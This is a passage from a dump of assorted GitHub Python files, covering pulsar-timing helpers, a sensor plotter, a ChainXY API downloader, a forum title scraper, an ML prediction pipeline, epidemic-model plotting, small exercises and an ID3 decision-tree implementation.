A few params (for example 'posPulsar') output multiple columns,\n using these will currently break things.\n\n Also currently assumes all outputs can be interpreted as floating\n point numbers.\n \"\"\"\n\n id_str = 'ABCD'\n s_arg = id_str\n for p in params:\n s_arg += \" {%s}\" % p\n s_arg += \"\\\\n\"\n\n t2output = subprocess.check_output([\"tempo2\", \"-nobs\", \"%d\"%_nobs, \n \"-output\", \"general2\", \n \"-f\", parfile, timfile, \n \"-s\", s_arg])\n\n goodlines = [x for x in t2output.decode(\"utf8\").split('\\n') if x.startswith(id_str)]\n nline = len(goodlines)\n\n result = {}\n for p in params:\n # Note, assumes single output column per requested param\n # and that all values are numerical\n result[p] = numpy.zeros(nline)\n\n for i in range(nline):\n vals = goodlines[i].split()\n for ip in range(len(params)):\n result[params[ip]][i] = vals[ip+1]\n\n return result\n\ndef chi2(parfile,timfile):\n \"\"\"\n Run tempo2, get chi2 (as reported by 'general' plugin)\n \"\"\"\n\n id_str = 'ABCD'\n t2output = subprocess.check_output([\"tempo2\", \"-nobs\", \"%d\"%_nobs, \"-output\", \"general\",\n \"-s\", id_str+' ', \"-f\", parfile, timfile])\n\n goodlines = [x for x in t2output.split('\\n') if x.startswith(id_str)]\n\n chi2 = 0.0\n for l in goodlines:\n vals = l.split()\n if vals[1]=='chisq' and vals[2]=='=':\n chi2 = float(vals[3])\n\n return chi2\n\ndef stats(parfile,timfile):\n \"\"\"\n Run tempo2, get chi2, ndof, rms (as reported by 'general' plugin)\n \"\"\"\n\n id_str = 'ABCD'\n t2output = subprocess.check_output([\"tempo2\", \"-nobs\", \"%d\"%_nobs, \"-output\", \"general\",\n \"-s\", id_str+' ', \"-f\", parfile, timfile])\n\n goodlines = [x for x in t2output.split('\\n') if x.startswith(id_str)]\n\n chi2 = 0.0\n for l in goodlines:\n vals = l.split()\n if vals[1]=='chisq' and vals[2]=='=':\n chi2 = float(vals[3])\n\n return chi2\n\ndef newpar(parfile,timfile):\n \"\"\"\n Run tempo2, return new parfile (as list of lines). 
input parfile\n can be either lines or a filename.\n \"\"\"\n orig_dir = os.getcwd()\n try:\n temp_dir = tempfile.mkdtemp(prefix=\"tempo2\")\n try:\n lines = open(parfile,'r').readlines()\n except:\n lines = parfile\n open(\"%s/pulsar.par\" % temp_dir, 'w').writelines(lines)\n timpath = os.path.abspath(timfile)\n os.chdir(temp_dir)\n cmd = \"tempo2 -nobs %d -newpar -f pulsar.par %s\" % (_nobs, timpath)\n os.system(cmd + \" > /dev/null\")\n outparlines = open('new.par').readlines()\n finally:\n os.chdir(orig_dir)\n os.system(\"rm -rf %s\" % temp_dir)\n for l in outparlines:\n if l.startswith('TRES'): rms = float(l.split()[1])\n elif l.startswith('CHI2R'): (foo, chi2r, ndof) = l.split()\n return float(chi2r)*float(ndof), int(ndof), rms, outparlines\n\n\n\n","repo_name":"demorest/tempo_utils","sub_path":"tempo2_utils.py","file_name":"tempo2_utils.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"27436361720","text":"import ADC0832\r\nimport time\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\ndef init():\r\n\tADC0832.setup()\r\ndef loop():\r\n\tn=0\r\n\ti=0\r\n\ty=[]\r\n\tx=[]\r\n\tt=time.process_time() \r\n\r\n\twhile n<10:\r\n\t\tdigitalVal=ADC0832.getResult()\r\n\t\ty.append(3.3*float(digitalVal)/255)\r\n\t\tx.append(time.process_time()) \r\n\t\tn=n+1\r\n\t#plt.axis([0.1,0.2,0.4,0.8])\r\n\t#前后两组参数分别表示x、y轴范围\r\n\t#等价于plt.xlim(0.1,0.2) plt.ylim(0.4,0.8)\r\n\tplt.plot(x,y,'-o')\r\n\twhile i<10:\r\n\t\tx1=\"%.3f\"%x[i]\r\n\t\ty1=\"%.2f\"%y[i]\r\n\t\ttext='{'+str(x1)+','+str(y1)+'}'\r\n\t\tplt.text(x[i],y[i],text)\r\n\t\ti=i+1\r\n\tplt.show()\r\nif __name__=='__main__':\r\n\tinit()\r\n\tloop()\r\n\tADC0832.destroy()\r\n\tprint(\"The End\")\r\n\t\r\n\t","repo_name":"Outsider565/Intro_to_electronic_system","sub_path":"lec3/measure_plt.py","file_name":"measure_plt.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"20038326406","text":"# AUTHOR: Andy Nguyen\n# FIXED BY: Andy Nguyen 09/21/22\n# FIX: Add main controller, new functions\n# This script sample allows you to download all scrape updates for individual chains and prints out a url in console\nimport requests\nimport json\nimport time\n\n# This is used for api calls with headers set in each function along with the api key being passed from main\ndef check_api_key(cxy_api_key):\n \n url = 'https://location.chainxy.com/api/Users/Me'\n headers = {'x-apikey': cxy_api_key,\n 'x-Application': 'Python API Call',\n 'content-type': 'application/json'}\n response = requests.get(url, headers=headers)\n if response.status_code == 401:\n raise ValueError(\"Bad ChainXY API key provided, double-check the provided value!\")\n\ndef generate_updates_list(cxy_api_key:str, chain_id:int):\n \"\"\"\n Returns a record list of chainxy scrape updates based on the provided chain_id from the main controller\n Params: Used to query out chain_id from api-caller\n cxy_api_key:str - ChainXY API Key\n chains_id:int - ID of the chain for which all the update ids will be returned.\n \"\"\"\n \n check_api_key(cxy_api_key)\n \n headers = {'x-apikey': cxy_api_key,\n 'x-Application': 'Python API Call',\n 'content-type': 'application/json'}\n \n apiUrl = \"https://location.chainxy.com/api/ChainScrapes\"\n \n params = {\n \"fields\": \"Id,RunDate\",\n \"Query\": str({\"ChainId\":chain_id}),\n \"Limit\": \"100\"\n }\n\n # Gets the data from the page and loads 
params and headers\n r = requests.get(url=apiUrl, params=params, headers=headers)\n r_body = json.loads(r.text)\n\n return r_body['Records']\n\ndef generate_downloads(cxy_api_key:str, scrape_update_list:list):\n \"\"\"\n Posts downloads on the CXY platform and prints out in console the list of scrapeids and the urls \n Params:\n cxy_api_key:str - ChainXY API Key\n scrape_update_list:list - Calls the returned list of Scapes from generate_updates_list\n \"\"\"\n \n check_api_key(cxy_api_key)\n \n headers = {'x-apikey': cxy_api_key,\n 'x-Application': 'Python API Call',\n 'content-type': 'application/json'}\n\n url_params = {\n \"format\": \"CSV\", # ZIP_CSV Also works\n \"splitLayers\": \"false\",\n # \"dataDate\": \"2019-10-03\" # OPTIONAL\n }\n\n data = {}\n createdScrapeFileURLs = []\n api_download_url = \"https://location.chainxy.com/api/ChainScrapes/Download/\"\n \n\n # Loops untill the end of the scape ids list and executes the post and get api calls as well as printing/returning the url to the console.\n for item in scrape_update_list:\n\n # Posts and creates the links on the platform here\n response = requests.post(url=api_download_url + str(item['Id']), data=json.dumps(data), params=url_params, headers=headers)\n r_body = json.loads(response.text)\n\n #Uses the \"Id\" in r_body for get request for the url link in order to print onto the console\n scrape_download_id = r_body['Id']\n print(\"Run Date: \" + str(item['RunDate']))\n fileGenerated = False\n createdScrapeFileURL = False\n \n # While Loop checks for status downloads for each step of the way and will pause for 5 seconds while it is downloading.\n while(fileGenerated == False):\n print(\"Checking for status of generated file, Download Id: \" + str(scrape_download_id) + \"...\")\n response = requests.get(url='https://location.chainxy.com/api/Downloads/{}'.format(scrape_download_id), headers=headers)\n r_body = json.loads(response.text)['Record']\n\n if r_body['Status'] == 0:\n print(\"Download Scrape ID: \" + str(item['Id']) + \" is still being generated\")\n time.sleep(5)\n\n elif r_body['Status'] == 2:\n print(\"File generation failed. 
Speak to ChainXY for assistance\")\n fileGenerated = True\n\n elif r_body['Status'] == 1:\n print(\"File generation completed!\")\n fileGenerated = True\n createdScrapeFileURL = r_body['Link']\n createdScrapeFileURLs.append(r_body['Link']) \n print('Download Link Here: {}'.format(createdScrapeFileURL))\n print('----------------------------------------------------------------') \n \n return createdScrapeFileURLs\n\ndef main():\n \"\"\"\n this function is used as a controller to pass the variables through the other functions and executes them\n cxy_api_key:str - Insert the generate ChainXY API Key to allow for api calls to the platform.\n chain_id:list - Choose which chain_id to pull scraping updates from.\n \"\"\"\n\n cxy_api_key = ''\n chain_id = 0 \n \n # Calls variables and Executes Functions here\n updates_record_list = generate_updates_list(cxy_api_key, chain_id)\n scrape_download_urls = generate_downloads(cxy_api_key, updates_record_list)\n\n\nif __name__ == '__main__':\n main()","repo_name":"ChainXY/ChainXY_API","sub_path":"python/DownloadAllUpdatesForChain.py","file_name":"DownloadAllUpdatesForChain.py","file_ext":"py","file_size_in_byte":4996,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"17893877276","text":"import sys\n\nday = int(sys.argv[1])\n\nout = ''.join([l for l in open('template.py', 'r')]) % (day, day)\n\nwith open('%d.py' % day, 'w') as f:\n f.write(out)\n\n\n","repo_name":"colton-p/aoc","sub_path":"old/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"42961078016","text":"# Prompt the user to enter a word and assign to variable\nuserWord = input(\"Please enter a word: \")\n# Make the word uppercase\nuserWord = userWord.upper()\nnonvowels = []\nprint(userWord)\n\n# Loop over the letters in the word\n# Do not print vowels\n# Add consonants to a list\n# Print list of consonants\nfor letter in userWord:\n vowels = ['A','E','I','O','U']\n if letter in vowels:\n continue\n nonvowels.append(letter)\nprint(' '.join(nonvowels))","repo_name":"Deanna2000/PythonPractice","sub_path":"eating_vowels.py","file_name":"eating_vowels.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"43558075141","text":"import sys\nimport os\nfrom src.Exception import customException\nfrom src.logger import logging\nfrom src.utils import load_object\nimport pandas as pd\n\n\nclass PredictPipeline:\n def __init__(self):\n pass\n\n def predict(self,features):\n try:\n preprocessor_path=os.path.join('artifact','preprocessor.pkl')\n model_path=os.path.join('artifact','model.pkl')\n\n preprocessor=load_object(preprocessor_path)\n model=load_object(model_path)\n\n data_scaled=preprocessor.transform(features)\n\n pred=model.predict(data_scaled)\n return pred\n \n\n except Exception as e:\n logging.info(\"Exception occured in prediction\")\n raise customException(e,sys)\n \nclass CustomData:\n def __init__(self,\n Open:float,\n High:float,\n Low:float,\n Close:float,\n Volume:float,\n Market_Cap:float\n ):\n \n self.Open=Open\n self.High=High\n self.Low=Low\n self.Close=Close\t\n self.Volume=Volume\n self.Market_Cap=Market_Cap\n \n \n\n def get_data_as_dataframe(self):\n try:\n custom_data_input_dict = {\n 'Open':[self.Open],\n 'High':[self.High],\n 'Low':[self.Low],\n 'Close':[self.Close],\n 
'Volume':[self.Volume],\n 'Market_Cap':[self.Market_Cap]\n \n }\n df = pd.DataFrame(custom_data_input_dict)\n logging.info('Dataframe Gathered')\n return df\n except Exception as e:\n logging.info('Exception Occured in prediction pipeline')\n raise customException(e,sys)\n","repo_name":"Shreyashchawda12/Bitcoin_prediction","sub_path":"src/pipeline/predict_pipeline.py","file_name":"predict_pipeline.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"25784368197","text":"import requests\nfrom lxml import etree\nimport json\n\n\nclass BtcSpider(object):\n def __init__(self):\n self.base_url = 'http://8btc.com/forum-61-'\n self.headers = {\n \"Cookie\": \"eCM1_5408_saltkey=rh53aKPV; eCM1_5408_lastvisit=1542615216; eCM1_5408_smile=2D1; UM_distinctid=1672b3ef6744a-064cc079dc7509-47e1039-144000-1672b3ef67516b; eCM1_5408_visitedfid=61D2D42D147D186D41D187; yd_cookie=cb4d61fc-df80-42f1a88b088312ae639a249701db97914f44; _ydclearance=348067b0f373f61ca38face9-5cad-429a-8449-7c4778ecee5f-1544892512; eCM1_5408_atarget=1; PHPSESSID=d6arrqnharnm6n1m7ipc2r3cr1; CNZZDATA5934912=cnzz_eid%3D1642669416-1542616124-http%253A%252F%252F8btc.com%252F%26ntime%3D1544883164; eCM1_5408_sid=eO5466; eCM1_5408_forum_lastvisit=D_61_1544886342; eCM1_5408_sendmail=1; _fmdata=tm5J8v6x5IsfhLn%2FJX0eqRLZvUsbF885abDrpjp7Xs5hzHOWR3SOwvVcf8c7ZjKz0w19NZMmzhe54w8%2BX2LALy%2FjZhH%2BTPn0IrDIsCIcCRg%3D; eCM1_5408_lastact=1544886374%09forum.php%09ajax; QINGCLOUDELB=357aa5de761afb88fff0143d75a28ce9df8df81e67e223b1ddcf15080c9f3df6|XBUYa|XBUWL\",\n \"User-Agent\": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'\n }\n\n self.data_list = []\n\n # 1.发请求\n def get_response(self, url):\n response = requests.get(url, headers=self.headers)\n # 网页的 编码到底 是 gbk 还是 urf-8 head--meta-charset=\"\"\n # \n data = response.content.decode('gbk')\n # data = response.content\n\n # with open('05btc.html', 'w') as f:\n # f.write(data)\n return data\n\n # 2.解析数据\n def parse_data(self, data):\n # 使用xpath 解析当前页面 所有的 新闻title 和url 保存\n # 1.转类型\n x_data = etree.HTML(data)\n\n # 2.根据xpath路径解析\n # 路径 mark 观察发现 有个独特的class\n #title_list = x_data.xpath('//a[@class=\"s xst\"]/text()')\n title_list = x_data.xpath('/html[1]/body[1]/div[6]/div[2]/div[1]/div[1]/div[3]/div[2]/div[2]/form[1]/div/div[2]/div[1]/a[2]/text()')\n #title_list = x_data.xpath('//div[contain(@id,\"normalthread_\")]/div[2]/div/a[1]/text()')\n\n # title_list = x_data.xpath('//form[@id=\"moderate\"]/div/div[2]/div/a[@class=\"s xst\"]/text()')\n url_list = x_data.xpath('//a[@class=\"s xst\"]/@href')\n\n # mark 处理数据格式\n for index, title in enumerate(title_list):\n news = {}\n # print(index)\n # print(title)\n news['name'] = title\n news['url'] = url_list[index]\n self.data_list.append(news)\n\n # 3.保存数据\n def save_data(self):\n\n # 将 list---str\n data_str = json.dumps(self.data_list)\n # 这样出来看到\\u5f88 这样是正常的 去https://www.bejson.com/ 校验 就能看到中文了\n with open('05btc.json', 'w',encoding='gbk') as f:\n f.write(data_str)\n\n # 4.启动\n def run(self):\n\n for i in range(1, 5):\n # 1.拼接 完整url\n url = self.base_url + str(i) + '.html'\n print(url)\n # 2.发请求\n data = self.get_response(url)\n\n # 3.做解析\n self.parse_data(data)\n # 4.保存\n 
self.save_data()\n\n\nBtcSpider().run()\n","repo_name":"hiei17/Crawler_Learning_Record","sub_path":"xpath/6.05-抓btc标题列表为例.py","file_name":"6.05-抓btc标题列表为例.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"2597428956","text":"from keras.models import load_model\nfrom keras.preprocessing import image\nimport numpy as np\nmodel = load_model('bird-model.h5')\n\nimg_name = './data/train/not_bird/Indigo_Bunting_0001_12469.jpg'\n\n# Load a single image into x\nwidth, height = 64, 64\nimg = image.load_img(img_name, target_size=(width, height))\nimg *= 255.0/np.array(img).max()\nx = image.img_to_array(img)\nx = np.expand_dims(x, axis=0)\n\n# create an array with a single image\nimages = np.vstack([x])\n\n# Test the class that the model is predicting\nclasses = model.predict_classes(images, batch_size=10)\nprint(classes)","repo_name":"ravelantunes/bird-classifier-model","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"39358135100","text":"import sys\nsys.path.insert(1, 'C:/Users/nicho/Documents/GitHub/SimplexSIS')\n\nimport simplexTheory\nimport simplexVisualize\nimport simplexContagion\nimport pickle\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom simplexTheory import *\nimport math\n\ngamma = 2\nisDegreeCorrelated = True\ntype = \"power-law\"\nminDegree = 50\nmaxDegree = 450\nexponent = 4.0\ndigits = 4\ntolerance = 0.0001\ndegreeHist = generateTheoreticalDegreeHist(minDegree, maxDegree, type, exponent=exponent)\nmeanDegree = computeMeanPowerOfDegreeFromHist(degreeHist, 1)\nmeanSquaredDegree = computeMeanPowerOfDegreeFromHist(degreeHist, 2)\nmeanSimplexDegree = meanDegree\n\nminAlpha = 0\nmaxAlpha = 0.06\nbetaCrit = meanDegree/meanSquaredDegree*gamma\nminBeta = 0.5*betaCrit\nmaxBeta = 1.5*betaCrit\n\nnumBetaPoints = 50\n\n#alphaCrit = calculateTheoreticalCriticalAlpha(gamma, betaCrit, minAlpha, maxAlpha, degreeHist, meanSimplexDegree=meanSimplexDegree, isDegreeCorrelated=isDegreeCorrelated, digits=digits, tolerance=tolerance)\nalphaCrit = 0.1\nalphaCritFraction = [1.0]\n\nbeta = np.linspace(minBeta, maxBeta, numBetaPoints)\nsimplexVisualize.plotTheoreticalInfectionCurves(gamma, beta, alphaCritFraction, alphaCrit, degreeHist, meanSimplexDegree=meanSimplexDegree, isDegreeCorrelated=isDegreeCorrelated, digits=digits)\n","repo_name":"nwlandry/SimplexSIS","sub_path":"_OBSOLETE/plotTheoryInfectionCurves.py","file_name":"plotTheoryInfectionCurves.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"36348614210","text":"\r\nimport sys\r\nimport os.path\r\nsys.path.append(\r\n os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\r\n\r\nimport calculator.calc_lib as calc\r\n\r\n\r\ndef stDev(file):\r\n \"\"\"\r\n **Stadandard Deviation:**\r\n Calculates the standard deviation of numbers input through stdin.\r\n\r\n :param file: stdin input\r\n\r\n :type file: string\r\n \r\n :return: Value of the standard deviation \r\n\r\n \"\"\"\r\n total = 0\r\n totalSquared = 0\r\n numbers = []\r\n for line in file:\r\n numbers.append(line.rstrip())\r\n N = len(numbers)\r\n\r\n for number in numbers:\r\n total = calc.Addition(total,float(number))\r\n totalSquared = calc.Addition(totalSquared,calc.Exponentiation(float(number),2))\r\n average = 
calc.Division(total,N)\r\n stdDevAverage = calc.Multiplication(N,calc.Exponentiation(average,2))\r\n stdDev = calc.Root(calc.Division(calc.Subtraction(totalSquared,stdDevAverage),N-1),2)\r\n print(stdDev)\r\n return None\r\n\r\n\r\n","repo_name":"Ruuza/ivs_project2","sub_path":"src/standard_deviation/standard_dev_lib.py","file_name":"standard_dev_lib.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"21036846380","text":"def examination(move):\n \"\"\"Проверка правильности входных данных\"\"\"\n valid_squares = [f + r for r in '12345678' for f in 'ABCDEFGH']\n if len(move) != 5:\n return False\n if move[:2] not in valid_squares or move[3:] not in valid_squares:\n return False\n if move[2] != '-':\n return False\n return True\n\ndef is_valid_knight_move(move):\n \"\"\"Проверка правильности хода\"\"\"\n file_diff = abs(ord(move[0]) - ord(move[3]))\n rank_diff = abs(int(move[1]) - int(move[4]))\n if file_diff == 1 and rank_diff == 2:\n return True\n if file_diff == 2 and rank_diff == 1:\n return True\n return False\n\n\nif __name__ == '__main__':\n\n move = input()\n if examination(move):\n if is_valid_knight_move(move):\n print('YES')\n else:\n print('NO')\n else:\n print('ERROR')\n","repo_name":"Dagvello/Beginner_course","sub_path":"lessons/Knight_move.py","file_name":"Knight_move.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"34113275278","text":"class Solution:\n def uniquePaths(self, m: int, n: int) -> int:\n grid = [[0]*n for _ in range(m)]\n grid[0][0] = 1\n for i in range(m):\n for j in range(n):\n if i + 1 < m:\n grid[i+1][j] += grid[i][j]\n if j + 1 < n:\n grid[i][j+1] += grid[i][j]\n return grid[-1][-1]\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n m, n = 3, 7\n print(sol.uniquePaths(m, n))\n","repo_name":"kazu0716/programing_training","sub_path":"leetcode/62.py","file_name":"62.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"25575613396","text":"from __future__ import print_function\nfrom __future__ import unicode_literals\nfrom __future__ import division\n\nimport math\n\n\ndef gini_value(dna_data):\n \"\"\"Calculates the gini value for a set of dna data.\n\n This calculates the gini value by taking the probabilty of each classification and multiplies them together.\n\n :type dna_data: dict\n :param dna_data: Set of parsed dna data.\n\n :rtype: float\n :returns: Calculated gini_value based on the dna data.\n \"\"\"\n p_values = dna_p_value(dna_data)\n gini_value = 0\n if p_values:\n for p in p_values:\n gini_value += p*p\n return 1 - gini_value\n\n\ndef gini_gain(dna_data, values, attr):\n \"\"\"Calculates the gain for a set of dna data based on the gini value.\n\n :type dna_data: dict\n :param dna_data: Set of parsed dna data.\n\n :type values: list\n :param values: List of values to calculate the gain accross\n\n :type attr: int\n :param attr: Attribute to calculate the gain for\n\n :rtype: float\n :returns: Calculated gain based on the gini value.\n \"\"\"\n #gain = gini_value(dna_data)\n size = len(dna_data)\n sum_total = 0\n for value in values:\n subset = get_subset(dna_data, value, attr)\n if subset:\n sum_total += (len(subset)/size) * gini_value(subset)\n return gini_value(dna_data) - sum_total\n\n\ndef is_same_class(dna_data):\n \"\"\"Returns the 
class of the data if all the data shares the same class.\n\n :type dna_data: dict\n :param dna_data: Set of parsed dna data.\n\n :rtype: bool\n :returns: True if the dna data is all the same class, False otherwise\n \"\"\"\n clses = [dna['class'] for dna in dna_data]\n return clses.count(clses[0]) == len(clses)\n\n\ndef get_class(dna_data):\n \"\"\"Returns the class that occurs most frequently in the given dna data\n\n :type dna_data: dict\n :param dna_data: Set of parsed dna data.\n\n :rtype: str\n :returns: The most common dna class in the dna data\n \"\"\"\n cls = ''\n class_count = dna_count_class(dna_data)\n max_count = max(class_count)\n if class_count[0] is max_count:\n cls = 'EI'\n elif class_count[1] is max_count:\n cls = 'IE'\n else:\n cls = 'N'\n return cls\n\n\ndef get_subset(dna_data, value, attr):\n \"\"\"Gets a subset of the data where attr has the given value.\n\n :type dna_data: dict\n :param dna_data: Set of parsed dna data.\n\n :type values: list\n :param values: List of dna values\n\n :type attr: int\n :param attr: Attribute in the dna data\n\n :rtype: float\n :returns: Calculated gain based on the gini value.\n \"\"\"\n subset = []\n for dna in dna_data:\n if dna['attrs'][attr] == value:\n # If the value of the attribute is what we are testing, add this dna to the subset\n subset.append(dna)\n return subset\n\n\ndef info_gain(dna_data, values, attr):\n \"\"\"Calculates the information gain for the given parameters.\n\n :type dna_data: dict\n :param dna_data: Set of parsed dna data.\n\n :type values: list\n :param values: List of values to calculate the gain accross\n\n :type attr: int\n :param attr: Attribute to calculate the gain for\n\n :rtype: float\n :returns: The calculated information gain for the given parameters.\n \"\"\"\n sum_total = 0\n for value in values:\n subset = get_subset(dna_data, value, attr)\n if subset:\n sum_total += (len(subset) / len(dna_data)) * entropy(subset)\n\n return entropy(dna_data) - sum_total\n\n\ndef info_gain_ratio(dna_data, values, attr):\n \"\"\"Calculates the information gain for the given parameters.\n\n :type dna_data: dict\n :param dna_data: Set of parsed dna data.\n\n :type values: list\n :param values: List of values to calculate the gain accross\n\n :type attr: int\n :param attr: Attribute to calculate the gain for\n\n :rtype: float\n :returns: The calculated information gain for the given parameters.\n \"\"\"\n gain_total = 0\n split_total = 0\n dna_total = len(dna_data)\n for value in values:\n subset = get_subset(dna_data, value, attr)\n if subset:\n ratio = len(subset) / dna_total\n split_total -= ratio * math.log(ratio, 2)\n gain_total += ratio * entropy(subset)\n\n if split_total != 0:\n gain = (entropy(dna_data) - gain_total) / split_total\n else:\n gain = entropy(dna_data) - gain_total\n return gain\n\n\ndef dna_p_value(dna_data):\n \"\"\"Calculates probabilty of each of the 3 classes for a set of strands.\n\n :type dna_data: dict\n :param dna_data: Set of parsed dna data.\n\n :rtype: tuple\n :returns: A tuple of the probability for (EI, IE, N)\n \"\"\"\n ei_count = 0\n ie_count = 0\n n_count = 0\n total = len(dna_data)\n for dna in dna_data:\n if dna['class'] == 'IE':\n ie_count += 1\n elif dna['class'] == 'EI':\n ei_count += 1\n else:\n n_count += 1\n try:\n return (ei_count/total, ie_count/total, n_count/total)\n except ZeroDivisionError:\n print (\"empty list cannot produce probability\")\n\n\ndef dna_count_class(dna_data):\n \"\"\"counts the number of each class and returns them in this order - ei, ie\n and 
n.\n\n :type dna_data: dict\n :param dna_data: Set of parsed dna data.\n\n :rtype: tuple\n :returns: A tuple of the counts for (EI, IE, N)\n \"\"\"\n ei_count = 0\n ie_count = 0\n n_count = 0\n for dna in dna_data:\n if dna['class'] == 'IE':\n ie_count += 1\n elif dna['class'] == 'EI':\n ei_count += 1\n else:\n n_count += 1\n return (ei_count, ie_count, n_count)\n\n\ndef entropy(dna_data):\n \"\"\"Calculates the entropy for a set of dna data\n\n :type dna_data: dict\n :param dna_data: Set of parsed dna data.\n\n :rtype: float\n :returns: The calculated entropy for a set of dna data\n \"\"\"\n p_values = dna_p_value(dna_data)\n\n total = 0\n for p in p_values:\n if p != 0:\n total -= p * math.log(p, 2)\n return total\n\n\ndef rej_null_hyp(pNode, dof, alpha):\n \"\"\"Calculates the counts needed to use chi_square.\n\n :type pNode: ID3Node\n :param pNode: Node to calculate chi squared for\n\n :type dof: int\n :param dof: Degrees of freedom of the data\n\n :type alpha: float\n :param alpha: alpha value to use in the lookup table\n\n :rtype: bool\n :returns: Whether or not to split at the given branch\n \"\"\"\n p_values = dna_p_value(pNode.dna_data)\n e_count = []\n r_count = []\n for child in pNode.children:\n child_total = 0\n class_count = dna_count_class(child.dna_data)\n r_count.append(class_count[0])\n r_count.append(class_count[1])\n r_count.append(class_count[2])\n child_total = sum(class_count)\n e_count.append(p_values[0]*child_total)\n e_count.append(p_values[1]*child_total)\n e_count.append(p_values[2]*child_total)\n return chi_square(e_count, r_count, dof, alpha)\n\n\ndef chi_square(e_count, r_count, dof, alpha):\n \"\"\"takes the a list of expected counts for IE, EI and N\n (can be fractions) and the real counts.\n\n :type e_count: int\n :param e_count: e_count value\n\n :type r_count: int\n :param r_count: r_count value\n\n :type dof: int\n :param dof: Degrees of freedom of the data\n\n :type alpha: float\n :param alpha: alpha value to use in the lookup table\n\n :rtype: bool\n :returns: The result of the chi squared test\n \"\"\"\n x2 = chi_sq_dist(dof, alpha)\n xc2 = 0\n for i in range(len(e_count)):\n if e_count[i] != 0:\n xc2 += ((r_count[i] - e_count[i])**2) / e_count[i]\n # also tried not adding r_count submission score was unchanged\n\n # reject null hypothesis\n return not xc2 > x2\n\n\ndef chi_sq_dist(dof, alpha):\n \"\"\"Calculates the critical value for chi squared.\n\n\n :type dof: int\n :param dof: Degrees of freedom of the data\n\n :type alpha: float\n :param alpha: alpha value to use in the lookup table\n\n :rtype: float\n :returns: The critical value based on the lookup table\n \"\"\"\n dof6 = [\n {'alpha': 0.20, 'crit_val': 8.558},\n {'alpha': 0.10, 'crit_val': 10.645},\n {'alpha': 0.05, 'crit_val': 12.592},\n {'alpha': 0.025, 'crit_val': 14.449},\n {'alpha': 0.02, 'crit_val': 15.033},\n {'alpha': 0.01, 'crit_val': 16.812},\n {'alpha': 0.005, 'crit_val': 18.548},\n {'alpha': 0.002, 'crit_val': 20.791},\n {'alpha': 0.001, 'crit_val': 22.458}\n ]\n\n dof14 = [\n {'alpha': 0.20, 'crit_val': 18.151},\n {'alpha': 0.10, 'crit_val': 21.064},\n {'alpha': 0.05, 'crit_val': 23.685},\n {'alpha': 0.025, 'crit_val': 26.119},\n {'alpha': 0.02, 'crit_val': 26.873},\n {'alpha': 0.01, 'crit_val': 29.141},\n {'alpha': 0.005, 'crit_val': 31.319},\n {'alpha': 0.002, 'crit_val': 34.091},\n {'alpha': 0.001, 'crit_val': 36.123}\n ]\n\n dofX = []\n if dof == 6:\n dofX = dof6\n elif dof == 14:\n dofX = dof14\n else:\n print (\"Unsupported degree of freedom used!\")\n return 0\n\n for cv 
in dofX:\n if cv['alpha'] == alpha:\n return cv['crit_val']\n return 0\n\n\nclass ID3Tree(object):\n root = None\n\n def __init__(self, dna_data=[], use_gini_index=False, alpha=0):\n self.root = ID3Node(None,\n dna_data=dna_data,\n use_gini_index=use_gini_index,\n alpha=alpha)\n\n if dna_data:\n self.create_tree()\n return\n\n def create_tree(self):\n \"\"\"Creates a new decision tree based on the given data.\"\"\"\n attrs = list(range(0, len(self.root.dna_data[0]['attrs'])))\n #values = ['A', 'G', 'T', 'C']\n values = ['A', 'G', 'T', 'C', 'D', 'N', 'S', 'R']\n self.root.create_subtree(values, attrs)\n return\n\n def classify_data(self, data):\n \"\"\"Find the classification for the given testing data.\n\n :type data: list\n :param data: Parsed testing data to classify.\n\n :rtype: list\n :returns: A classification for each data item in the testing data set.\n \"\"\"\n classification = []\n for item in data:\n idx, attrs = item.values()\n cls = self.root.get_class(attrs)\n classification.append({'id': idx,\n 'class': cls})\n return classification\n\n\nclass ID3Node(object):\n parent = None\n children = []\n\n dna_data = []\n value = ''\n attr = 0\n cls = ''\n\n use_gini_index = False\n alpha = 0\n\n def __init__(self, parent, dna_data=[], value=0,\n use_gini_index=False, alpha=0):\n self.parent = parent\n self.children = []\n\n self.value = value\n self.dna_data = dna_data\n self.use_gini_index = use_gini_index\n self.alpha = alpha\n return\n\n def is_leaf(self):\n \"\"\"Tests whether this node is a leaf node or not.\n\n :rtype: bool\n :returns: True if this is a leaf node, False otherwise\n \"\"\"\n return not self.children\n\n def is_root(self):\n \"\"\"Tests whether this node is the root.\n\n :rtype: bool\n :returns: True if this is the root node, False otherwise\n \"\"\"\n return not self.parent\n\n def add_child(self, 